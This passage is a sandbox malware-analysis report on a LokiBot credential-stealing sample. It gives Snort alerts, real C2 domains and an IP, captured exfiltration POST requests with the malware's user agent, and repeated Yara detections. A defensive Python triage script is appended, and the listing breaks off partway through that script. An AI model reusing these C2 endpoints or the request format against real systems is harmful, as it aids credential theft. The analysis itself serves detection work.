                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49738 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49738 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49741 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49741 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49742 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49742 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49742 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49743 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49743 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49743 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49744 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49744 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49746 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49746 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49746 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49747 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49747 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49747 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49749 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49752 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49752 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49752 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49754 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49754 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49754 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49756 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49756 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49757 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49757 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 45.77.223.48:80
                      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49758 -> 45.77.223.48:80
                      Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
                      Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
                      Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
                      Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
                      Source: Malware configuration extractor | URLs: http://45.77.223.48/~blog/?ajax=a
                      Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: global traffic | HTTP traffic detected:
                          POST /~blog/?ajax=a HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 45.77.223.48
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 8425B4CA
                          Content-Length: 176
                          Connection: close
                      Source: global traffic | HTTP traffic detected:
                          POST /~blog/?ajax=a HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 45.77.223.48
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 8425B4CA
                          Content-Length: 149
                          Connection: close
                      Source: unknown | TCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 13_2_00404ED4 recv,13_2_00404ED4
                      Source: unknown | HTTP traffic detected:
                          POST /~blog/?ajax=a HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 45.77.223.48
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 8425B4CA
                          Content-Length: 176
                          Connection: close
                      Source: gunzipped.exe, 00000007.00000002.1965144690.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, gunzipped.exe, 00000007.00000002.1966713417.0000000000C28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.77.223.48/~blog/?ajax=a
                      Source: gunzipped.exe, 00000007.00000002.1967011464.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.77.223.48/~blog/index.php?rest_route=/
                      Source: gunzipped.exe, mPvIOxEZXJsdYp.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: gunzipped.exe, 00000000.00000002.1739814239.000000000798C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningC
                      Source: gunzipped.exe, mPvIOxEZXJsdYp.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: gunzipped.exe, 00000000.00000002.1739814239.000000000798C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.cRa
                      Source: gunzipped.exe, mPvIOxEZXJsdYp.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
                      Source: gunzipped.exe, 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, mPvIOxEZXJsdYp.exe, 00000008.00000002.1763912656.0000000002F66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
                      Source: mPvIOxEZXJsdYp.exe, mPvIOxEZXJsdYp.exe, 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                      Source: gunzipped.exe, 00000007.00000002.1967011464.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.w.org/
                      Source: gunzipped.exe, mPvIOxEZXJsdYp.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                      System Summary

                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: Process Memory Space: gunzipped.exe PID: 6640, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7368, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
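The Yara hits above are listed once per memory dump and once per unpack variant, so the same LokiBot body in one process appears a dozen times. The Python below is an added example, not part of the Joe Sandbox report: it parses these Source / Matched rule entries into one view per process, keyed by the process index that the report uses both in the unpack names (`0.2.gunzipped.exe.…`) and in the dump names (`00000000.00000002.….sdmp`). That correspondence, and the reading of the fields as process index, dump index and region base, is inferred from this report rather than taken from Joe Sandbox documentation. It also flags processes whose hits sit at 0x400000, the default image base of a 32-bit PE: a native LokiBot payload mapped there, read together with the NtUnmapViewOfSection calls listed just below, is the pattern to chase first when reconstructing the injection chain. The sample lines are copied from the entries above in their raw extracted form (cell separators missing); the parser tolerates that as well as the separated form.

```python
"""Collapse Joe Sandbox 'Matched rule' entries into one view per process.

Added example, not part of the Joe Sandbox report.  The identifier layout
is inferred from this report (an assumption, not Joe Sandbox documentation):
  '0.2.gunzipped.exe.47f36e8.8.unpack'                 -> process index 0, dump 2,
                                                          image gunzipped.exe, region 0x47f36e8
  '00000000.00000002.<id>.00000000047D9000.<...>.sdmp' -> process index 0 (hex), dump 2,
                                                          region base 0x47D9000
  'Process Memory Space: gunzipped.exe PID: 6640'      -> whole-process string scan
"""
import re
from collections import defaultdict

# Tolerates both the raw extracted form ('UNPACKEDPEMatched rule:') and a
# separated form ('UNPACKEDPE | Matched rule:').
LINE_RE = re.compile(r"Source:\s*(.*?),\s*type:\s*([A-Z]+)\s*\|?\s*Matched rule:\s*(.*)")
UNPACKED_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?\.exe)\.([0-9a-fA-F]+)\.(\d+)\.(raw\.unpack|unpack)$")
SDMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.\d+\.([0-9A-Fa-f]{16})\.")
MEMSTR_RE = re.compile(r"^Process Memory Space:\s*(\S+)\s+PID:\s*(\d+)$")

DEFAULT_IMAGE_BASE = 0x400000  # default image base of a 32-bit PE


def rule_name(rest):
    """Short form '<description> Author: <who>' or long form '<rule_id> key = value, ...'."""
    if " Author: " in rest:
        return rest.split(" Author: ", 1)[0].strip()
    return rest.split(None, 1)[0]


def parse_source(src, kind):
    """Return (process_key, image_name_or_None, region_base_or_None); key is None if unparsed."""
    if kind == "UNPACKEDPE":
        m = UNPACKED_RE.match(src)
        if m:
            return int(m.group(1)), m.group(3), int(m.group(4), 16)
    elif kind == "MEMORY":
        m = SDMP_RE.match(src)
        if m:
            return int(m.group(1), 16), None, int(m.group(3), 16)
    elif kind == "MEMORYSTR":
        m = MEMSTR_RE.match(src)
        if m:
            # This form carries a PID but no process index, so key it by PID instead.
            return "pid:" + m.group(2), m.group(1), None
    return None, None, None


def triage(lines):
    """Group rule hits per process: {key: {"image": str|None, "rules": set, "regions": set}}."""
    procs = defaultdict(lambda: {"image": None, "rules": set(), "regions": set()})
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        src, kind, rest = m.groups()
        key, image, region = parse_source(src.strip(), kind)
        if key is None:
            continue
        entry = procs[key]
        entry["rules"].add(rule_name(rest))
        if image:
            entry["image"] = image
        if region is not None:
            entry["regions"].add(region)
    return dict(procs)


def hollowed_candidates(procs):
    """Process indices with a rule hit at the default image base, where a replaced image would sit."""
    return sorted(k for k, v in procs.items() if isinstance(k, int) and DEFAULT_IMAGE_BASE in v["regions"])


# Raw extracted entries copied from the report (cell separators missing, as on the page).
SAMPLE_LINES = [
    "Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly",
    "Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown",
    "Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown",
    "Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group",
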